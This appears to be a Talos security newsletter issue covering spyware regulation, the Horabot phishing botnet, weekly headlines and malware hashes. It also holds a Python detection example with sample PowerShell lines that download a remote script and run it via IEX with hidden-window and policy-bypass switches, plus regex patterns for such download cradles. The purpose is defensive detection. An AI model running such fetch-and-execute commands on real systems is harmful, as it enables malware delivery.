Welcome to this week’s edition of the Threat Source newsletter.

The use of spyware continues to make headlines across the globe. While it is primarily used by authoritarian regimes to surveil targets such as political opponents or activists, governments all over the world are guilty of entering into deals with the companies that make spyware.

Many of these same governments (looking at you, U.S.) are still using this software despite active attempts to stop companies from creating and selling spyware. It’s not just governments, either. Everyone from jealous exes to overbearing spouses has used spyware to track, quite literally, every move the target makes.

Talos recently dissected one such spyware, Predator, revealing new details about exactly how it works and the various functions it uses to track the target and steal information from their device, including data that could let the operator pinpoint the target’s exact location.

U.S. President Joe Biden signed an executive order a few weeks ago that bars the U.S. government from entering into contracts to use commercial spyware that poses a risk to national security or has been misused. The administration also threatened to step in when it looked like a U.S. company was going to purchase NSO Group, the infamous Israeli maker of the Pegasus spyware.

The European Union is also under pressure to adopt new anti-spyware laws after a study from a European Parliament special committee found that Hungary and Poland used surveillance software to illegally monitor journalists, politicians and activists.

New legislation and policy can certainly help in stopping the development of these dangerous tools, but actions speak louder than words.

Between 2011 and 2023, at least 74 governments worked with commercial firms to obtain spyware or digital forensics technology, according to a report from Carnegie’s global inventory of commercial spyware and digital forensics. So, if the U.S. passes anti-spyware laws, that still leaves another 70-some countries where this needs to be addressed.

Biden’s executive order isn’t bulletproof, either. The U.S. still does not have a comprehensive privacy law that could provide legal protections to targets of spyware or regulate what types of software private companies can build.

Individual states and local governments can also still pass their own rules that could prevent companies in their jurisdictions from producing this type of software.

And internationally, it will take a coalition of governments to place international economic pressure on companies that make spyware. This could include sanctions against individual companies, or against the countries that allow those companies to operate within their borders.

As bad guys have shown throughout the history of the internet, they’re going to find ways to get around rules and regulations. The work our researchers did to uncover more about Predator is incredibly important because these tools pose a serious threat to human rights and to the national security of all nations.

I’d encourage everyone to ask lawmakers at all levels about what they're doing to address the international proliferation of spyware. All countries should be working to reduce demand and supply of spyware, because the industry clearly isn’t going to slow down on its own.

The one big thing

Talos has observed a threat actor deploying a previously unidentified botnet program Talos is calling “Horabot,” which delivers a known banking trojan and spam tool onto victim machines in a campaign that has been ongoing since at least November 2020. The campaign involves a multi-stage attack chain that begins with a phishing email and leads to payload delivery through the execution of a PowerShell downloader script and DLL sideloading into legitimate executables.

Why do I care?

This newly discovered botnet allows threat actors to gain complete control of the target’s Outlook mailbox. And it’s targeting users with Yahoo, Gmail and Outlook email accounts, three of the most popular email providers across the globe. Anyone hit with Horabot is at risk of having their contact list stolen, after which the threat actor uses the victim’s own mailbox to send phishing emails with malicious HTML attachments to those contacts, spreading the malware further.

So now what?

Phishing education continues to be of the utmost importance. If one person inside an organization is infected with Horabot, it puts the entire company at risk of being targeted. Users should be educated on how to spot obvious phishing attempts or potentially malicious attachments. Talos’ blog post on Horabot also outlines several Cisco Secure solutions that can detect and block this new botnet.
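The attack chain summarized above starts with a phishing email carrying an HTML attachment and continues with a PowerShell downloader. As an added example (this is not Talos code and is not drawn from the Horabot write-up), the Python below shows two generic checks a defender can run over their own telemetry: flagging messages that carry HTML-type attachments, and scoring PowerShell script-block text for download cradles combined with evasion switches. The messages, script blocks and IP address are constructed for the example and are not Horabot indicators; the `suspicious` threshold is an assumption to tune for your environment.

```python
import email
import re
from email import policy

# Constructed sample messages (not real Horabot samples): one benign plain-text
# message and one carrying an HTML attachment of the kind used as a phishing lure.
BENIGN_EML = """\
From: colleague@example.com
To: victim@example.com
Subject: Meeting notes
Content-Type: text/plain; charset="utf-8"

See you at 3pm.
"""

LURE_EML = """\
From: billing@invoice-example.test
To: victim@example.com
Subject: Factura pendiente
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain; charset="utf-8"

Please open the attached invoice.
--XYZ
Content-Type: text/html; name="factura.html"
Content-Disposition: attachment; filename="factura.html"
Content-Transfer-Encoding: 7bit

<html><body><script>location='https://lure.example.test/x'</script></body></html>
--XYZ--
"""

# File extensions treated as HTML-type lures (.hta included because it runs as script on Windows).
HTML_EXTENSIONS = (".html", ".htm", ".hta")


def html_attachments(raw_eml: str) -> list[str]:
    """Return filenames of attached HTML-type parts found in a raw RFC 822 message."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    found = []
    for part in msg.walk():
        if part.is_multipart():          # containers carry no payload of their own
            continue
        fname = part.get_filename() or ""
        is_attachment = part.get_content_disposition() == "attachment"
        looks_html = (part.get_content_type() == "text/html"
                      or fname.lower().endswith(HTML_EXTENSIONS))
        if is_attachment and looks_html:
            found.append(fname)
    return found


# Constructed PowerShell script-block text (what Event ID 4104 logging records);
# the commands are illustrative, not a real Horabot downloader.
SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\victim\\Documents | Measure-Object",
    "powershell -w hidden -nop -ep bypass -c (New-Object Net.WebClient)"
    ".DownloadString('http://203.0.113.7/s.ps1') | IEX",
    "Invoke-WebRequest -Uri http://203.0.113.7/x.zip -OutFile $env:TEMP\\x.zip; "
    "Expand-Archive $env:TEMP\\x.zip $env:TEMP",
]

# Download-cradle primitives commonly used to fetch and run a second stage.
CRADLE_PATTERNS = [
    re.compile(r"Net\.WebClient", re.I),
    re.compile(r"Download(String|File|Data)\s*\(", re.I),
    re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer)\b", re.I),
    re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
]
# Switches that hide the window, skip profiles, bypass policy or encode the command.
EVASION_PATTERNS = [
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
    re.compile(r"-nop\b|-noprofile\b", re.I),
]


def score_powershell(block: str) -> dict:
    """Count cradle and evasion indicators in one script block and apply a threshold."""
    cradle_hits = sum(1 for p in CRADLE_PATTERNS if p.search(block))
    evasion_hits = sum(1 for p in EVASION_PATTERNS if p.search(block))
    # Assumed threshold: at least one cradle primitive, and two indicators in total,
    # so a lone Invoke-WebRequest from an admin is surfaced for review, not alerted on.
    suspicious = cradle_hits >= 1 and (cradle_hits + evasion_hits) >= 2
    return {"cradle_hits": cradle_hits, "evasion_hits": evasion_hits, "suspicious": suspicious}


if __name__ == "__main__":
    for name, raw in (("benign", BENIGN_EML), ("lure", LURE_EML)):
        print(name, "html attachments:", html_attachments(raw))
    for block in SCRIPT_BLOCKS:
        print(score_powershell(block), block[:60])
```

The email check keys on Content-Disposition plus content type or extension rather than the subject or sender, since the mailbox takeover described above means lures arrive from trusted contacts. The PowerShell scorer deliberately leaves a single download primitive unflagged: the signal worth alerting on is a cradle paired with window hiding, policy bypass or an encoded command.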

Top security headlines of the week

Newly leaked documents show that Spain is advocating that the European Union ban end-to-end encryption, and that the policy has support among other member nations. The European Commission has for years been considering laws that would ban encryption so that governments could scan private messages to identify potentially illegal content. In the leaked document, Spain argues that it is “imperative that we have access to that data,” though privacy and security experts are concerned about the implications. Several companies that offer encrypted messaging services have threatened to cease operations in the EU rather than break their encryption. At least one member country, Germany, says it would not enforce the law if passed. (Wired, techdirt)

Security researchers at Microsoft revealed that Chinese state-sponsored actors may have access to U.S. critical infrastructure networks; American officials say they are still actively working to remove the threat and to confirm that the adversaries have been eliminated. Microsoft said the actors targeted the U.S. territory of Guam, likely to disrupt critical communications in the event of a military conflict between the U.S. and China in the Pacific, most plausibly one triggered by a Chinese invasion of Taiwan. National Security Agency Director of Cybersecurity Rob Joyce said the activity likely dates to last year and that the Biden administration is concerned about the “scope and scale” of the campaign. (New York Times, CNN)

Various industries are still feeling the effects of a data breach at outsourcing firm Capita. As many as 90 organizations have reported breaches of personal information that Capita held on their behalf, according to the U.K.’s Information Commissioner’s Office. Capita, which provides critical services to national and local governments in Britain, first disclosed the breach in late March. A large number of U.K. public and private organizations use Capita, which handles the personal information of millions of people; it also administers pension payouts for other companies’ employees, and its clients include local government councils. The Capita incident highlights the downstream effects a single data breach can have on every organization that relies on the breached supplier. (The Guardian, BBC)

Can’t get enough Talos?

Upcoming events where you can find Talos

Cisco Live U.S. (June 4 - 8)

Las Vegas, NV

REcon (June 9 - 11)

Montreal, Canada

Most prevalent malware files from Talos telemetry over the past week

SHA 256: a8a6d67140ac6cfec88b748b8057e958a825224fcc619ed95750acbd1d7a4848
MD5: 8cb26e5b687cafb66e65e4fc71ec4d63
Typical Filename: a8a6d67140ac6cfec88b748b8057e958a825224fcc619ed95750acbd1d7a4848-dropped.bin
Claimed Product: Datto Service Monitor
Detection Name: W32.Auto:a8a6d6.in03.Talos

SHA 256: f3d5815e844319d78da574e2ec5cd0b9dd0712347622f1122f1cb821bb421f8f
MD5: a2d60b5c01a305af1ac76c95e12fdf4a
Typical Filename: KMSAuto.exe
Claimed Product: N/A
Detection Name: W32.File.MalParent

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934
MD5: 93fefc3e88ffb78abb36365fa5cf857c
Typical Filename: Wextract
Claimed Product: Internet Explorer
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d
MD5: fd743b55d530e0468805de0e83758fe9
Typical Filename: KMSAuto_Net.exe
Claimed Product: KMSAuto Net
Detection Name: W32.File.MalParent